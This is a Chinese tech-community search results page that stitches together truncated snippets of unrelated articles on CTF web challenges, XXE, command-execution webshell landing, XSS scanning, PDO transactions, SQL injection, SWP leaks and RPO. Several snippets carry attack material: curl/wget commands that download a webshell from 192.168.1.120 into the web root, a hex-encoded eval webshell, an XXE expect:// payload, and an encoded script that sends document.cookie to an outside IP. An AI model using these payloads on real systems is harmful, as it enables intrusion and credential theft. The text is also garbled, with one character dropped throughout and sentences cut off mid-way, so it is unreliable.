首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

BUUCTF 刷题笔记——Web 1

图片 验证是否为命令注入,以分号分隔,这样会依次执行命令,后接 ls 命令,若显目录则此处存在命令注入。结果如图,文件名,注入点存在。...-- secr3t.php --> 那就老老实实打开这个文件看看,浏览器了一段代码并且提示 flag 就在 flag.php 文件中。...[极客大挑战 2019]BabySQL 打开靶机,经典极客大挑战的界面,在账户密码处输入测试字符,含有单引号,结果浏览器了报错。...文件,因此尝试直接访问该文件,发现直接回显出了源代码,当然这是因为作者设定好未接收到变量则代码,只能说感谢手下留情了。...isset($_GET['num'])){ show_source(__FILE__); // 未接收到变量则代码 }else{ $str = $_GET['num'

3.3K20
您找到你想要的搜索结果了吗?
是的
没有找到

XXE-XML外部实体注入-知识点

是独立于软件和硬件的信息传输工具 XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件...HTML被设计用来显示数据,其焦点是数据的外观 HTML旨在显示信息,而XML旨在传输信息 如何去挖XXE漏洞: 抓包修改数据类型,把json改成xml来传输数据 Content-Type: application...DOCTYPE 根元素名称 PUBLIC "DTD标识名" "公用DTD的URI"> 外部引用语音和支持的协议 不同的语言对协议的支持是不一样的,我在网上找的参考图: XXE攻击常用的语句: 有...ENTITY xxe SYSTEM "expect://id"> ]> &xxe; 无的情况需要公网服务器或者内网搭建一个服务,让被攻击者机器去调用攻击者写好的 外部实体dtd...在被攻击端引入外部实体后 结果在 日志里或者自己写一个脚本储存都可以 这里是查看日志的 dtd: 可以将内部的%号要进行实体编码成% 这个是php的经过base64加密后显示结果 根据情况修改

70020

命令执行之文件落地利用总结

0x02 Linux (1) 目标出网,命令有 如果目标主机可以出网,并且执行命令有,这时我们就可以直接通过执行以下命令来获取目标网站的绝对路径,然后再利用以下多种方式写入或下载Webshell...>' > /var/www/html/shell.php 远程下载写入: curl http://192.168.1.120/shell.txt > /var/www/html/shell.php wget...http://192.168.1.120/shell.txt -O /var/www/html/shell.php (2) 目标出网,命令无 如果目标主机可以出网,执行命令无,这时我们可以通过执行以下命令使用.../shell.php echo 3C3F706870206576616C28245F504F53545B315D293B3F3E | xxd -r -ps > /var/www/html/shell.php...如果目标主机可以出网,执行命令无,这时我们可以通过执行以下命令在指定的C盘中循环查找1653042293000.png文件,将找到的文件绝对路径保存在%i变量,然后执行certutil通过httplog

91620

XSS 扫描器成长记

3 HTML解析&分析反射 如果参数可以,那么通过html解析就可以获得参数位置,分析的环境(比如是否在html标签内,是否在html属性内,是否在注释中,是否在js中)等等,以此来确定检测的payload...从这两处细微的差别可以看到,awvs宁愿漏报也不误报,结果会很准确,xray更多针对白帽子,结果会宽泛一些。 5.对于在html注释内的内容,以下case <!...1 扫描流程 我的扫描器扫描流程是这样的 发送随机flag -> 确定参数回 -> 确定显位置以及情况(html,js语法解析) -> 根据情况根据不同payload探测 -> 使用html,js...语法解析确定是否多出来了标签,属性,js语句等等 使用html语法树检测有很多优势,可以准确判定所处的位置,然后通过发送一个随机payload,例如,再使用语法检测是否有Asfaa这个标签...html语法树用python自带的库 from html.parser import HTMLParser js检测也是如此,如果内容在JavaScript脚本中,发送随机flag后,通过js语法解析只需要确定

1.4K10

PHP的PDO事务与自动提交

PHP PDO 事务与自动提交 现在通过 PDO 连接上了,在开始进行查询前,必须先理解 PDO 是如何管理事务的。...这种安全措施有助于在脚本意外终止时避免出现不一致的情况——如果没有式地提交事务,那么假设是某个地方出错了,所以执行滚来保证数据安全。...注意:只有通过PDO::beginTransaction()启动一个事务后,才可能发生自动滚。如果手动发出一条查询启动事务, 则 PDO 无法知晓,从而在必要时不能进行滚。...两个更新分别完成起来很简单,通过封闭在PDO::beginTransaction()和PDO::commit()调用中,可以保证在更改完成之前,其他人无法看到这些更改。...如果发生了错误,catch 滚自事务启动以来发生的所有更改,并输出一条错误信息。 <?

1.2K31

XXE攻击与防御

表示组织; DTD 表示类型;Config 表示标签;3.0是标签后附带的版本号; EN表示DTD语言是英语;最后是DTD的URL; 其中,外部引用可支持http、file等协议,不同语言支持的协议不同,存在一些通用的协议...漏洞利用 有漏洞 <?...($data) ;//注释掉该语句即为无的情况 ?...加密 无文件读取 将PentesterLab .iso 镜像直接导入 对于新手小白不会安装的同学,博主这里直接给你们安利了更简单的 链接:https://pan.baidu.com/s/1H1TG9jkLfZVoFF-X1iPzaQ...提取码:bg4j 实验拓扑 实验前提目标服务器存在xxe: 我们向的服务器发送恶意的xml request请求到服务器端,服务器收到我们发送的xml request,就会请求我们自定义的服务器

1.3K40

Ladon捕获0day payload批量getshell

由于Ladon的web只支持html,并不支持asp\php\jsp等动态脚本,所以没办法模拟菜刀成功连接后,后续的功能,所以只能监听到首次发包payload。...由于是HTTP协议,可以通过浏览器访问得到LadonBASE64解密结果,就是说我们只要通过命令行发送HTTP请求即可在Ladon控制台看到命令执行后的结果。...执行CMD代码 接收到的CMD,通过此代码执行命令并获取结果。...,将会导致很多命令无法通过GET方式取回,所以我们可通过BASE64传,既不直接暴露CMD结果,也解决了多行结果无法问题。...无命令执行漏洞之Linux渗透方法 无命令执行漏洞之PowerShell http://k8gege.org/p/Ladon_ps1_echo.html JAVA反序列化漏洞命令执行方法

1.4K10

SWP文件泄露利用

第一次产生的交换文件名为.index.php.swp,再次意外退出后将会产生名为.index.php.swo的交换文件,第三次产生的交换文件则为.index.php.swn 漏洞利用1 下面以CTFHUB...nc命令与curl,符合条件的girl_friend会被exec()函数执行,但是我们知道exec()函数是无的所以只能用反弹shell的方法了,由于这题的环境靶机无法访问外网,所以需要一个内网靶机来做...这里就直接用了题目中推荐的Basic中的Linux Labs,由于这台靶机已经安装了lamp,已指出http服务 我们用xshell连上这个靶机并用ifconfig命令查看靶机的IP 在我们靶机的/var/www/html...例如,可以使用编辑器的自动保存功能,在编辑器崩溃或意外关闭时自动保存文件,避免SWP文件的生成和泄露 用户安全意识培训:最重要的是,用户应该被教育和提醒,避免意外泄露SWP文件。...为了防止SWP文件泄露,编辑器应该被正确地配置,SWP文件应该被保护和定期清理,实施安全措施并教育用户避免意外泄露SWP文件

30020

BUU-WEB-第二章

[SUCTF 2019]EasySQL image.png 我们先输入1,返回有。 image.png 继续测试其它字符,发现输入数字都有,但是如果输入的是字母,则没有。...1.报错注入 1' 输入:1' 没有,应该是存在SQL注入,但是关闭了错误,所以报错注入是行不通了。...[成功][7] 同理我们刚刚尝试过:1;show tables 同样得到了。 但是show columns from Flag就不行。...image.png 尝试ping了一下本地,发现返回的和正常ping一样的结果,尝试输入长字符串没有得到。...image.png 有,我们在在后边继续执行语句,先查看一下ls; image.png 这里发现终端有一个flag.php和一个Index.php,cat flag.php一下试一试 image.png

1.3K40

MySQL手工注入学习-1

--+ 确定存在注入点,并猜测SQL语句为: select [字段] from [表] where [id]="$id"; 猜解列数: 因为UNION联合语句函数的格式要求,UNION后的联合语句的字段数要和...UNION前的列数一致…… order by * union select 1,2,…… ?...我们就可以通过不断的条件绕过的模式来获取所有内容!在很多情况下我们发现无法完全内容,都可以利用这个方法来绕过已知字段信息 Less-2 通过判断注入点的语句,判断注入点为数字型注入点: ?...按照这回,可以认为这是一处盲注…… SQL盲注点 ~~ UNION联合()查询的方法就不可以了…… 基于布尔的盲注 ?...select database()),0x7e),0x7e) --+ 基于时间的盲注 主要思路就是利用时间延迟来判断布尔条件是否达成,本质上是利用时间延迟来进行布尔和报错盲注的判断依据条件;用于没有任何信息的时候使用

1.2K30

RPO分析+Share your mind分析

Nginx url及返回结果 http://127.0.0.1/rpo/yang/index.php #页面返回正常 http://127.0.0.1/rpo/yang%2findex.php...Apache不会将'%2f'作为'/'处理,所以执行的结果就是去rpo目录下寻找名为yang%2findex.php的文件,显然服务器并没有yang%2findex.php该文件,所以显示not found...- 等待。 因为对引号过滤,所以使用String.fromCharCode(解ascii码)来绕过过滤。...110,101,119,32,73,109,97,103,101,40,41,46,115,114,99,61,34,104,116,116,112,58,47,47,49,53,48,46,57,53,46,49,55,52,46,50,52,53,58,56,56,56,56,63,97,61,34,43,101,110,99,111,100,101,85,82,73,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59)); 收到...a="+document.getElementById("frame").contentWindow.document.cookie; } 提交后收到 ? 结束!

53130
领券